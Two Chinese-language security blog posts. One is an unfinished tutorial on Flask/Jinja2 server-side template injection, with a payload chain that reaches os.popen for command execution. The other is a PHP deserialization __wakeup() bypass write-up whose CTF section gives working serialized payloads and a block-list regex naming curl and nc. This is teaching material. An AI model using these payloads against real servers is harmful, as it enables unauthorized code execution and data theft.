x2658y's Blog

杂七杂八的记事本

发表于 更新于 分类于 本文字数: 1k 阅读时长 ≈ 4 分钟

Python中的特殊属性/方法/函数

SSTI中, 往往通过寻找基类->查找子类->执行危险函数来完成攻击, 需要了解一些Python类的特殊属性/方法/函数.

  • __class__: 对象的属性, 返回对象所属的类.

  • __mro__: 类的属性, 返回一个含有所有父类(包括间接父类和本类)的元组.

  • __base__: 类的属性, 返回类的直接父类.

  • __bases__: 类的属性, 返回类的所有直接父类. 跟__base__的区别在于, 如果子类是多继承, __base__只会返回一个, 而__bases__返回所有. __base__相当于__bases__[0].

  • __globals__: 函数的属性, 用于获取某个函数所在处位置的全局命名空间的变量, 当函数位于另一个模块时, 可以获取另一个模块的全局命名空间的变量.

  • __subclassess__(): 类的方法, 返回类的直接子类.

  • __dict__: 对象的属性, 一个字典, 储存对象的所有属性.

  • __init__(): 类的方法, 用于初始化对象. 在SSTI中用它作为跳板拿到__globals__属性. 如果声明类时未重载__init__(), 此时的__init__没有__globals__属性.

    未重载的__init__: <slot wrapper '__init__' of 'object' objects>

    重载过的__init__: <function A.__init__ at 0x00000257D3B0D1F0>

  • __import__: 这个函数在built-in命名空间里, 效果等同于import语句, 返回值是一个模块对象.

Flask的SSTI

Flask是一个流行的轻量级Web框架, 基于Python.

基本使用

1
2
3
4
5
6
7
8
9
10
from flask import Flask

app = Flask(__name__)

@app.route('/')     #设定路由/
def main():
    return 'Hello World!'   #函数的返回值作为网页传递给浏览器

if __name__ == '__main__':
    app.run()       #默认监听127.0.0.1:5000

使用模板

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from flask import Flask, render_template_string


tpl = """
<h1>Hello {{ request.args.get("name") }}!<h1/>
"""
#可以在模板中使用request, session, config, g对象

app = Flask(__name__)

@app.route('/')     #设定路由/
def main():
    return render_template_string(tpl)

if __name__ == '__main__':
    app.run(debug=True)       #默认监听127.0.0.1:5000

提交一个name参数就可以看到回显了, 但是这个没法注入, 表达式已经执行过了.

image-20230409144519964

这样就可以注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from flask import Flask, render_template_string, request


tpl = "<h1>Hello {0}!<h1/>"
#模板中可以使用的对象
#request, session, config, g, url_for
#namespace, lipsum, range, dict, self
#get_flashed_messages, cycler, joiner

app = Flask(__name__)

@app.route('/')     #设定路由/
def main():
    return render_template_string(tpl.format(request.args.get("name")))

if __name__ == '__main__':
    app.run(debug=True)       #默认监听127.0.0.1:5000
image-20230409150416232

表达式能被执行即可注入.

注入测试

就用上面的代码作为服务端.

找基类object

1
2
3
4
5
6
7
''.__class__.__mro__[1]        #把空字符串换成空字典和空列表也行, 下同
''.__class__.__base__
''.__class__.__bases__[0]
request.__class__.__mro__[-1]
request.__class__.__base__.__base__.__base__
request.__class__.__bases__[0].__bases__[0].__bases__[0]
#request可以换成session, config, g等, 但是类继承的层级不一样

主要就是利用__base____mro__这样的属性找到基类.

找重载过__init__()方法的子类

BurpSuite扫一下__subclasses__()返回的所有类, 根据回显判断__init__()是否被重载过, 也可以根据名字选择已知的某些特殊的类, 比如warnings.catch_warnings, 这个类中含有os模块无需导入.

image-20230409154648676
image-20230409154838014

比如这个索引为106的类就重载了__init__(), 接着访问函数的__globals__属性, 通过keys()查看有哪些变量 

1
''.__class__.__mro__[1].__subclasses__()[106].__init__.__globals__.keys()

image-20230409155635438

可以看到, 有__builtins__, 于是可以通过__builtins__里的__import__()加载想要的模块, 比如os.

1
''.__class__.__mro__[1].__subclasses__()[106].__init__.__globals__["__builtins__"]["__import__"]("os").popen("dir").read()
image-20230409155959824

也可以用__builtins__里的eval()等函数实现RCE或者文件读取写入等功能.

Jinja2的特性

template中使用变量时, 可以用[]取代.的功能, 同理也可以用.取代[]的功能. 可以用这个来绕过.或者[]WAF.

1
2
{{ foo.bar }}
{{ foo['bar'] }}

这两行代码可以实现相同的功能, 但有一些细微的区别

foo.bar:

  • 首先执行getattr(foo, 'bar')
  • 如果没找到, 再执行foo.__getitem__('bar')
  • 都没找到, 返回一个未定义的对象

foo['bar']:

  • 首先执行foo.__getitem__('bar')
  • 如果没找到, 再执行getattr(foo, 'bar')
  • 都没找到, 返回一个未定义的对象

未完待续

发表于 更新于 分类于 本文字数: 729 阅读时长 ≈ 3 分钟

unserialize() 反序列化产生一个对象时, 会检查对象是否存在一个__wakeup()方法, 如果有则先调用它进行反序列化前的准备工作, 例如重新建立数据库连接, 或执行其它初始化操作.

官方示例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
class Connection 
{
    protected $link;
    private $server, $username, $password, $db;
    
    public function __construct($server, $username, $password, $db)
    {
        $this->server = $server;
        $this->username = $username;
        $this->password = $password;
        $this->db = $db;
        $this->connect();
    }
    
    private function connect()
    {
        $this->link = mysql_connect($this->server, $this->username, $this->password);
        mysql_select_db($this->db, $this->link);
    }
    
    public function __sleep()
    {
        return array('server', 'username', 'password', 'db');
    }
    
    public function __wakeup()
    {
        $this->connect();
    }
}
?>

当被反序列化的字符串中表示的对象属性个数大于对象实际的个数时, __wakeup()将被跳过执行.

实验:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php	//test.php
    class ABC
    {
        public $a = 1;
        public $b = 2;
        function __wakeup(){
            echo "Wake Up!";
        }
    }
    $i = new ABC();
    echo serialize($i);
	//输出为
	//O:3:"ABC":2:{s:1:"a";i:1;s:1:"b";i:2;}
?>

改一下代码 

1
2
3
4
5
6
7
8
9
10
11
<?php	//test.php
    class ABC
    {
        public $a = 1;
        public $b = 2;
        function __wakeup(){
            echo "Wake Up!";
        }
    }
	unserialize($_GET["str"]);
?>

把刚才的O:3:"ABC":2:{s:1:"a";i:1;s:1:"b";i:2;}带入参数str中请求

image-20230406231932410

反序列化触发了__wakeup()方法, 绕过只需要对属性个数进行修改

修改前:O:3:"ABC":2:{s:1:"a";i:1;s:1:"b";i:2;}

修改后:O:3:"ABC":3:{s:1:"a";i:1;s:1:"b";i:2;}

也就是从2个属性改成3个属性.

更改属性数量导致与实际数量不符会导致反序列化失败, 但是unserialize()会将遇到错误之前能填充的属性都填充上, 遇到错误之后再执行__destruct()将构造到一半的对象析构, 并返回一个false. 所以在__destruct()方法里可以正常访问已经被填充的属性.

接下来是一道CTF题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

考点就是绕过__wakeup(), 首先生成Payload

1
2
3
4
5
6
7
8
9
<?php
    class ctf
    {
        protected $username = 'admin';
        protected $cmd = 'ls';
    }
    $i = new ctf();
    fwrite(fopen("data.bin", "wb"), serialize($i));
?>

访问一下, 查看data.bin文件

image-20230407000850092

仔细看的话可以发现, *的两边都各有一个\x00字节, 但是这在文本上是显示不出来的, 这也是为什么采用写入文件再查看这种麻烦的方式而不采用echo直接浏览器查看.

所以构造Payload的时候要采用%00\x00字节补上去.

所以Payload就是: O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";}

image-20230407001903508

因为cat被过滤了, 所以用tac就可以了

最终Payload: O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

0%